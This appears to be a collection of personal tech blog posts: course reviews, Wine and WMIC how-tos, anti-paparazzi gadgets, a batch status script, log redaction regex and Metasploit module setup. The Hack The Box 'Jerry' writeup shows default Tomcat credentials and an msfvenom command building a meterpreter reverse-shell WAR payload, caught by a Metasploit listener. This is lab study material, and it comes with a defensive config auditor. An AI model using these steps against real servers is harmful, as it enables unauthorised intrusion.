Review of Udemy course – AZ-300 Azure Architecture Technologies Certification Exam


I recently passed the AZ-300 and wanted to review some of the material I used to pass it in case anyone else is thinking of taking it and wants some advice on how to prepare.

This AZ-300 course from Scott Duffy is aimed at people wishing to take the Azure technologies exam from Microsoft. The exam itself covers a lot of high-level concepts within the Azure system and aims to certify that you understand a wide variety of concepts within Azure at an architect level.

The syllabus is very broad and covers topics from networking, scaling up and out automatically, security, migration, web apps and anything else you’d expect a consultant to be able to advise on if you were planning on moving to Azure.



  • The course consists of lots of videos split into neat sections covering the entire AZ-300 syllabus
  • The videos are high quality, clearly explaining what Scott is talking about
  • The audio quality is very high
  • Scott has clearly been using Azure for years and you get the impression he is talking about a lot of the topics from experience and not just documentation.


  • This course is nowhere near enough by itself to pass the AZ-300, the exam is very in depth and asks some awkward questions which this course does not prepare you for
  • The video course is only 10.5 hours, I suspect most people will be putting in 50+ hours of prep in order to pass the exam
  • There is a lack of practical lessons which would help put the course topics into practice.


Nobody is going to be passing the exam using just this study guide by itself. As you will need to buy other materials I can’t justify recommending this video series. Instead you should take a look and find a larger and more in depth course which provides lessons/labs to go alongside the theory. It is too easy to halfheartedly nod along to these video lessons without any of the knowledge sinking in.

The course content itself is well made, there just isn’t enough of it to make it worthwhile. The scenarios that would justify getting this course would be if you already have bought and used a larger 30-40 hour course and want to go over the topics again from a different perspective or if you are not interested in sitting the exam but just want to see what Azure has to offer as an alternative to AWS or on premise solutions.

Buy a larger course first, then some practice labs, then one or two sets of practice exam questions, and if you still need something extra to study after that then this course is the right thing to get.

How to install Wine and Python 2.7

Wine is a tool (not an emulator) for running Windows-based programs on non-Windows operating systems such as Linux. These are the steps to get it installed on Kali Linux with Python 2.7.

First add the i386 architecture to your system in case you don’t already have it, the command won’t do anything if you have it already. Skip this first step if that is the case.


Next run apt-get update to refresh your package repositories. This will make sure you get the latest version of Wine:

apt-get update


Install the Wine package using apt-get install wine32. This could take a few minutes depending on your internet connection and you will be asked to confirm the install near the start.

apt-get install wine32


Once installed you should see wine in the /root/.wine folder with a Windows C:/ structure inside it:


The next stage is to download and install Python into your Wine install. Visit the Python download page at:


and download the Windows x86 MSI Installer. The file is only 19MB in size so should come down very quickly.



Now navigate to your downloads folder in the terminal and install it using wine msiexec /i python-2.7.14.msi

wine msiexec /i python-2.7.14.msi


The install wizard should appear and unless you have some specific requirements for the install you can just hit next, next, next, finish through the windows.



Once the install is complete you can confirm it’s there by navigating to the new Python folder within the Wine directory:




Anti-Paparazzi technology part 2

The last post about Anti-Paparazzi clothing sent me down a rabbit hole finding out about other recent inventions designed to stop cameras. Here’s a brief summary of what other options exist if you can’t get hold of a nifty reflective scarf:

Flash back handbag


A student named Adam Harvey invented a handbag add-on which detects a camera flash and in return flashes right back at it before the photo is taken. The result is a ruined photograph. I believe the downside is that this device is only quick enough to thwart slower shutter speeds, which is good enough if you are in a dark area or out at night but won’t have much of an effect at sporting events where photographers will typically be using quicker shutter speed settings. The device is also not in commercial production but the inventor still deserves some respect for trying to beat a flash at its own game.


Anti photography paint

An article in the Express claims that any photographs taken of Angelina Jolie giving birth are fakes because the hospital she was at coated the windows with anti-photography paint. I’m a bit dubious about this claim as the article gives no further details about how it works and Google comes up short when trying to find other examples of this technology being used elsewhere.

I think this might be a bit of a case of the journalist taking some creative liberties and the windows of the hospital room were either coated with the same stuff as one way mirrors (suggesting the inside was kept darker than normal) or the windows simply had the same privacy filters applied that you can get for your office computer to prevent shoulder surfing:


Privacy screen from 3M

Dubious article from the Express



A decade ago there were reports of technology on Roman Abramovich’s new super boat which utilised lasers to scan in all directions and detect the CCD (charge-coupled device) of a digital camera and blind it. The CCD is the part of the camera which detects light before coding the information into pixels. The lasers are able to detect these and send an extra bright beam directly at the CCD, blinding it without affecting anything else.

This technology was first developed as a way to try to stop pirates recording movies in the cinema. There is a lot of speculation (including from the device’s inventor) as to how effective it is when taken outside of a small dark cinema room and stuck to the side of a giant yacht in the ocean in broad daylight.

– Roman’s big yacht

techradar – review of the technology

Anti face recognition

There is some interesting work going into stopping facial recognition technology doing its thing. This won’t stop a paparazzi taking a direct photo of you but it might hinder any automated CCTV or video recording software which activates and focuses based on what it detects as a human face.

At CV Dazzle there is a group of make-up artists designing styles which stop common facial recognition technology from being able to detect a face. It works by disguising common features which some face recognition technology relies on such as the colouring of eyes, the nose bridge or the edges of the mouth.

anti face recognition make up

The same guy mentioned previously (Adam Harvey) who works on CV Dazzle and the flash-back camera also has a project called “Hyperface” which designs patterns which, instead of being detected as a non-face, get detected as hundreds of individual faces, hopefully confusing the facial recognition software and hiding your real face.

Looking at the sample designs it seems strange how little is needed for software to detect a “face”. A very simple design of pixels which can just about pass as eyes, nose and a mouth seems to be all it takes:

facial recognition baffle


CV Dazzle – make up camouflage



Anti-Paparazzi clothing

This is probably a problem which doesn’t affect too many readers but if you want to avoid having your photo taken on a night out either by a professional photographer or a snap-happy friend with an iPhone there is a company named “Beta Brand” who makes anti-paparazzi clothing which ruins flash photos.

The clothing itself contains lots of tiny glass spheres which act as a super reflective material which bounces back as much of the light from a flash as possible and tricks a camera into thinking the scene is a lot lighter than it really is. A lot of today’s modern cameras will auto adjust the picture settings and make everything seem darker to adjust for the mass of light it sees coming in.

Its main downsides are that it doesn’t work if the camera isn’t using a flash or if the photographer is manually adjusting all the settings. The clothes aren’t too overpriced and look cool themselves so it’s likely that wearing them might end up attracting more attention from fans who snap a photo, check that it looks weird and suddenly get more curious as to what is going on.

You can read more about it here:

PetaPixel – Watch flashback anti-paparazzi clothing ruin flash photographs

Digitalrev – How anti paparazzi clothing works

Bored Panda – Anti paparazzi clothing chris holmes

Hack the Box Jerry

Hack The Box – Jerry – Writeup

Jerry is a retired box from HTB so can only be done if you have a premium VIP account.

It shows the risks of leaving default credentials for installed services. The solution I’ve got here is fairly standard and I’ve kept in a little extra in terms of thought processes which didn’t go anywhere instead of just writing out how to get the flags yourself.

First step is to run an Nmap scan of the target and note that it only comes back with one port, running Apache Tomcat version 7.0.88 and Coyote JSP Engine 1.1


As it looks like a web server, we can visit the site and confirm it looks like a base install of Apache Tomcat version 7.0.88


Only thing to notice from this generic Tomcat page is a file path name. This is worth noting in case we are trying to navigate around the file system at a later point in time.


Normally this might be the time to start running a tool like dirb or dirbuster to try and find what else is available on this server however some nice links are given to us in the top right as “Server Status” “Manager App” and “Host manager”. All 3 present us with a login box if we try to access them.


As this looks like a default install of Tomcat let’s check to see if the default credentials have been changed. A quick Google search reveals a GitHub page with about 20 default passwords listed for Tomcat installs. If there were more than 20 we could use Hydra to automate trying them, however as the passwords were short and simple enough you can work through them manually very quickly.


Doing this with the Server status module yields success for the login admin:admin

There isn’t much to see on this page, the only thing which stands out is an out of date java version which isn’t directly vulnerable now but worth noting for later if we get stuck.


Trying to log into the other modules now gives a HTTP 403 authorisation error instead of the password prompt from before. This is because the site is still trying to login with the admin:admin credential from earlier and while it registers as a valid set of credentials the admin account doesn’t have authorisation to access the other modules. There is no logout option on the site so you need to clear your browser history to reset.


A different set of default credentials from GitHub is successful and we can get into the Manager app using tomcat:s3cret

There is plenty of interesting info on this page but the obvious place to start looking is the upload feature. Any functionality which gives us the ability to put our own files onto a remote server and execute them is a good candidate for further investigation.


If we can get a file onto the server which executes a reverse shell and connects back to us we can use that as a foothold to get further into the system. Let’s use msfvenom to help create this reverse shell in a .war format as it is most likely going to be accepted by the uploader. We know the server is sending out HTTP traffic so as a first choice we should look at using the HTTP reverse shell. Any protocol not blocked by the firewall is likely to work for this.


We need to edit the options in the Meterpreter shell with the details of our local machine IP and port and give it a name of dodgyfile.war

msfvenom -p windows/x64/meterpreter_reverse_http LHOST= LPORT=4567 -f war -o dodgyfile.war


The .war file is going to have a .jsp file inside with a randomised name. This is in an effort to try to disguise it from virus scanners. It’s worth making a note of the name in case we need to manually visit it later. You can view the contents of the war file using any zip tool.


Now that we have the payload we should setup our machine to start listening in case the reverse shell gets activated as soon as we complete the upload.

Setup Metasploit as the listener by opening it up and using the exploit/multi/handler and giving it a few parameters


Set the local host to your network interface (look it up using ifconfig if needed). Set the port to whatever was set in the payload previously.

Start the listener using exploit -j (-j puts the process into the background as soon as it starts)


Back on the target website let’s try and upload our dodgy file. Fingers crossed there aren’t any extra security checks which might flag up the file (unlikely, but we won’t know until we try).


Looks like it has uploaded fine. Checking the Metasploit listener, it hasn’t auto-run so we need to find out how to get it started manually.


After a bit of clicking about and trying the features on the app manager page it looks like you can manually navigate to the .jsp we noted earlier to get it to execute.


As our listener was in the background waiting it caught the incoming connection and we can interact with it using:

sessions -i 1


To make things easier to navigate use the shell command and you can start enumeration and browsing for the required flags.


Slightly disappointing that there is no privilege escalation required for this box as you start your shell as the system account by default and can go straight into the administration account. The only small challenge left is to remember how to use quotes to see the contents of a text file with spaces in its name. Both flags are in the same text file.
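The weakness this box demonstrates can be checked for on your own servers. The following is an added example, not part of the original writeup: it parses a tomcat-users.xml and flags accounts that still use a default pair or that can deploy WAR files through the Manager app. The sample XML is constructed, the default list holds only the two pairs named in this post, and passwords are assumed to be stored in plain text (a digested password will not match).

```python
import xml.etree.ElementTree as ET

# Default pairs named in this writeup; extend with your own list.
KNOWN_DEFAULTS = {("admin", "admin"), ("tomcat", "s3cret")}
# Tomcat roles that allow deploying a WAR through the Manager app.
DEPLOY_ROLES = {"manager-gui", "manager-script"}
# Other built-in management roles (status pages, JMX, Host Manager).
OTHER_MGMT_ROLES = {"manager-status", "manager-jmx", "admin-gui", "admin-script"}

# Constructed sample configuration (not taken from the target in the post).
SAMPLE = """<tomcat-users>
  <role rolename="manager-gui"/>
  <user username="admin" password="admin" roles="manager-status"/>
  <user username="tomcat" password="s3cret" roles="manager-gui,manager-script"/>
  <user username="deploy" password="Xk9-constructed-long-secret" roles="manager-script"/>
  <user username="viewer" password="Qp4-constructed-long-secret" roles="manager-status"/>
  <!-- <user username="both" password="tomcat" roles="tomcat,role1"/> -->
</tomcat-users>
"""


def audit_users(xml_text):
    """Return [(username, severity, reasons)] for accounts that need attention."""
    root = ET.fromstring(xml_text)
    findings = []
    for el in root.iter():
        # Newer Tomcat versions put the file in an XML namespace; ignore it.
        if el.tag.rsplit("}", 1)[-1] != "user":
            continue
        name = el.get("username") or el.get("name") or ""
        password = el.get("password", "")
        roles = {r.strip() for r in el.get("roles", "").split(",") if r.strip()}

        reasons = []
        weak = False
        if (name, password) in KNOWN_DEFAULTS:
            reasons.append("default credential pair")
            weak = True
        elif password and password == name:
            reasons.append("password equals username")
            weak = True

        can_deploy = bool(roles & DEPLOY_ROLES)
        if can_deploy:
            reasons.append("can deploy WAR files via Manager")
        elif roles & OTHER_MGMT_ROLES:
            reasons.append("holds a management role")

        if weak and can_deploy:
            severity = "critical"   # guessable login that leads to code execution
        elif weak:
            severity = "high"       # guessable login, limited access
        elif can_deploy:
            severity = "review"     # strong-looking password, but confirm it is needed
        else:
            continue
        findings.append((name, severity, reasons))
    return findings


if __name__ == "__main__":
    for user, severity, reasons in audit_users(SAMPLE):
        print(f"{severity:8} {user:8} {'; '.join(reasons)}")
```

Users that appear only inside XML comments, as in the stock file, are not active and are not reported.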



Review of Udemy course – The RedTeam blueprint a unique guide to ethical hacking


RedTeam Nation – Brandon Dennis – Certificate of completion

The RedTeam Blueprint is a video course created by Brandon Dennis which aims to take anyone with no previous security knowledge and give them a good starting point from which to pursue a career in cyber security.

The course covers all the topics you would expect as well as a multitude of others such as the typical structure of red and blue teams, advice for applying for jobs and tips for passing the interviews.

Most courses I’ve seen in the past briefly advise learners to find a programming language they are comfortable with and take a separate course to improve their knowledge, however Brandon’s course includes 2:30 of Python tutorials and 1:40 in Assembly. While this is only enough to cover the topics briefly it is more than enough to get someone started with either language.


Brandon himself has completed the OSCP and is studying for the OSCE. It feels like his choice of topics and how deep he goes into each topic is aimed at someone who eventually wants to commit and study for the OSCP. The course would also be useful for someone looking at the CompTIA Security+ or the EC-Council CEH.


  • Far more in depth than other courses I’ve seen which claim to go to beginner –> hacker
  • Plenty of demonstrations showing the concepts discussed.
  • The course covers far more than just the technical aspect of cyber security.
  • Lots of extra resources provided with the lectures such as templates or links for further reading:
    Extra resources attached to lectures
  • All the standard stages of a red team assignment are covered: reconnaissance, enumeration, exploit, pivoting, privilege escalation, persistence, covering tracks.
  • The teachers voice is clear and easy to understand.


  • The screen capture was recorded at a high resolution and is sometimes only visible if you have a good steady internet connection which auto connects at 1080p. For some reason you cannot manually set it to anything higher than 720p, which means if you are on a weak connection you cannot see what is happening on screen.
  • The module regarding job hunting and salary is very specific to the USA. This isn’t Brandon’s fault and I wouldn’t expect him to tailor-make videos for every country but it is worth noting if you are somewhere where the IT job market is very different from America.


Very in-depth course and value for money if you buy it during a Udemy sale.

Check the up/down status of servers and services with a batch file

Here is a template for a batch file you can run on demand to check the up/down status of servers and services using the command prompt.

Most companies will be using some sort of automated tool for monitoring the status of their servers however if you don’t have the budget or want something quick to use here is something you can setup which pings as many servers or services as you want and outputs their status to a text file which can quickly be scanned to find out if any have gone down unexpectedly.

Or maybe you pushed out a Windows patch to all your machines and want to check everything has come back up after reboots?


  • Copy and paste the below script into a text file and save it using any name but with a .bat extension
  • Place it in c:\X\ (if needed you can change this location in the script)
  • Edit the bat file and replace #SERVER and #SERVICENAME with whatever you are checking. The service name can be found in the properties
  • It should look like this:
  • When you run the batch file it will output all the raw data into a file called servicestatus.txt then clean it up and place the final output into a file called FinalReport.txt which you can easily scan to see which servers either haven’t responded to ping or which services are showing as stopped.



REM -----------------------SECTION 1--------------------------------------
REM This checker has 4 sections
REM Section 1 = Version details and notes
REM Section 2 = Pings a list of servers to ensure they are up
REM Section 3 = Contacts a list of services to ensure they are up
REM Section 4 = Gets the raw output of sections 2+3 and removes unwanted lines, then outputs the results to FinalReport.txt

REM -----------------------SECTION 2--------------------------------------
REM One ping line per server
ping #SERVER1 >> c:\x\servicestatus.txt
ping #SERVER2 >> c:\x\servicestatus.txt
ping #SERVER3 >> c:\x\servicestatus.txt

REM -----------------------SECTION 3--------------------------------------
REM One sc line per service; repeat a server to check several of its services
sc \\#SERVER1 query #SERVICENAME >> c:\x\servicestatus.txt
sc \\#SERVER1 query #SERVICENAME >> c:\x\servicestatus.txt
sc \\#SERVER2 query #SERVICENAME >> c:\x\servicestatus.txt
sc \\#SERVER3 query #SERVICENAME >> c:\x\servicestatus.txt
sc \\#SERVER3 query #SERVICENAME >> c:\x\servicestatus.txt

REM -----------------------SECTION 4--------------------------------------
REM Drop the noise lines from the raw output, then delete the raw file
findstr /v "statistics Packets Approximate Minimum TYPE WIN32 STOPPABLE SERVICE_EXIT_CODE CHECKPOINT WAIT_HINT" c:\x\servicestatus.txt > c:\x\FinalReport.txt
del "C:\X\servicestatus.txt" /f /q

Remove IP addresses from multiple log files

Log files can grow as large as you let them and if for any reason you need to redact the IP addresses they hold it’s often impractical to do it manually.

It can be automated using Notepad++ (a free text editor) with some clever regex.

There are 2 different methods: one using a simple regex which will do the job but will also remove some non-IP numbers which look similar in format to an IP address, and one using a longer, IP-specific regex.

Quick and dirty method

Here are some demo log files with thousands of IP addresses inside:


Launch Notepad++ and select search >> find in files >>


The quick and dirty regex is: (\d{1,3}\.){3}\d{1,3}

Set some replacement text or leave blank if you want to just delete the entries.

Set the directory which contains your log files, and most importantly set the search mode to “regular expression”. It’s set to “Normal” by default.


When you press “Replace in Files” you’ll turn this:


Into:


As you can see it’s also gone through all of the log files and saved you a lot of manual time and effort:


Regex explained:


(\d{1,3}\.) finds any set of numbers 1-3 digits in length with a full stop at the end.

{3} repeats the previous regex 3 times.

\d{1,3} is similar to the first part and searches for a set of numbers 1-3 digits in length but with no full stop at the end.

The reason you cannot simply use (\d{1,3}\.){4} is because the last octet of an IP address doesn’t end with a full stop.

The problem with this quick regex is that it will also pick up numbers such as:

999.999.999.999 which is not a valid IP. Depending on the contents of your log files this might not be a problem.

IP Specific regex

If the quick and dirty method doesn’t do exactly what you need you can use this much longer regex to specify the numbers which can appear in an IP address:


It will do mostly the same as the previous regex but is smart enough to not remove 999.999.999.999
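The difference between the two approaches can be seen by running both over the same lines. This is an added example, not part of the original post: QUICK is the post's quick regex, while STRICT is a stricter pattern written for this example (the post's own longer regex is not reproduced here), and the log lines are constructed.

```python
import re
from pathlib import Path

# The quick pattern from the post, unchanged.
QUICK = re.compile(r"(\d{1,3}\.){3}\d{1,3}")

# Stricter pattern written for this example: every octet must be 0-255, and
# the lookarounds stop a match from starting or ending inside a longer
# dotted number such as 1234.56.78.9012.
OCTET = r"(?:25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)"
STRICT = re.compile(rf"(?<!\d)(?<!\d\.){OCTET}(?:\.{OCTET}){{3}}(?!\d)(?!\.\d)")

# Constructed sample log lines.
SAMPLE = """\
2019-03-02 10:14:07 login ok user=alice src=192.168.1.10
2019-03-02 10:14:09 login failed user=bob src=10.0.0.256
2019-03-02 10:15:30 agent build 999.999.999.999 started
2019-03-02 10:16:02 order ref 1234.56.78.9012 shipped
2019-03-02 10:17:45 blocked 203.0.113.7.
"""


def redact(text, pattern, replacement="[REDACTED]"):
    """Return text with every match of pattern replaced."""
    return pattern.sub(replacement, text)


def redact_dir(directory, pattern, glob="*.log", replacement="[REDACTED]"):
    """Redact every matching file in place; return {filename: replacements}.

    Equivalent of "Replace in Files". newline="" keeps the original line
    endings and surrogateescape keeps any non-UTF-8 bytes intact.
    """
    counts = {}
    for path in sorted(Path(directory).glob(glob)):
        with open(path, encoding="utf-8", errors="surrogateescape", newline="") as fh:
            original = fh.read()
        cleaned, n = pattern.subn(replacement, original)
        if n:
            with open(path, "w", encoding="utf-8", errors="surrogateescape", newline="") as fh:
                fh.write(cleaned)
        counts[path.name] = n
    return counts


if __name__ == "__main__":
    print("--- quick ---")
    print(redact(SAMPLE, QUICK))
    print("--- strict ---")
    print(redact(SAMPLE, STRICT))
```

The quick pattern cuts into the order reference and removes the out-of-range values; the strict one leaves them alone. Neither can tell an IP address from a four-part version number with in-range parts, so check a sample of the output before overwriting the only copy of a log.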


How to add a custom module to Metasploit

Metasploit comes with thousands of modules preinstalled but there is nothing stopping you from adding some brand new ones from the internet or altering existing ones.

Here is the method for taking an existing exploit and adding your own custom version of it to Metasploit, the same instructions can be adapted for adding a brand new exploit from the internet.

  • By default in Kali the modules are all stored in /usr/share/metasploit-framework/modules. It’s worth checking yours are here before we continue.


  1. Open up msfconsole and navigate to your modules folder.
  2. In this example we will be making a custom version of the ms02_056_hello.rb mssql exploit. Use the mkdir command to create a custom folder in a sensible location and copy the exploit into it using cp.
  3. Navigate to your custom folder and confirm the exploit copy is there.
  4. Open up the exploit using any editor (ignore this if you don’t intend on making any changes and have found a module from the internet).
  5. Make the changes you want. In this example we have just changed the description as a demonstration. Save your new exploit.
  6. Use the mv command to give your exploit a custom name. This stops you accidentally confusing it with the original code in the future.
  7. Metasploit won’t be able to find your exploit until after you exit and reopen msfconsole. You’ll see a search error if you try.
  8. After closing and reopening msfconsole your code should be visible within Metasploit to use just like the preinstalled ones.

Find Lenovo serial number using WMIC


It can be very annoying to try and find the serial number of your laptop only to realise it’s on a little sticker somewhere inaccessible, requiring you to hunt for a screwdriver to remove a panel, or forcing you to power down to remove the battery.

If you’ve had your machine for a while it’s possible the numbers on it have faded or the sticker has partly come off, forcing you to play a vague form of hangman to figure it out.

The serial number isn’t something most people care about, unless the laptop gets stolen or they are trying to check warranty online. Trying to find the serial after you’ve lost your laptop isn’t going to be too successful so it’s recommended to find it and make a note just in case.

If you do find yourself struggling to get the serial by looking at the sticker this might save you some frustration:

  1. Open up an elevated command prompt
  2. Type “Wmic bios get serialnumber” and press enter

If the serial is registered in the BIOS it should get displayed on screen. I’ve tested the command successfully on various Lenovo laptops, and both HP and Dell desktops.

If you are on a network you can query the serial of a remote machine using:

  • wmic /node:NameOfRemoteMachine bios get serialnumber

If you don’t have the correct permissions to the other machine, or have mistyped the computer’s name, you can expect to see this error:

WMIC error for no access or incorrect computer name

If you get unlucky and the serial isn’t in the BIOS you’ll get this error and start swearing as you head back to Google to find another method:

WMIC error for no entry in BIOS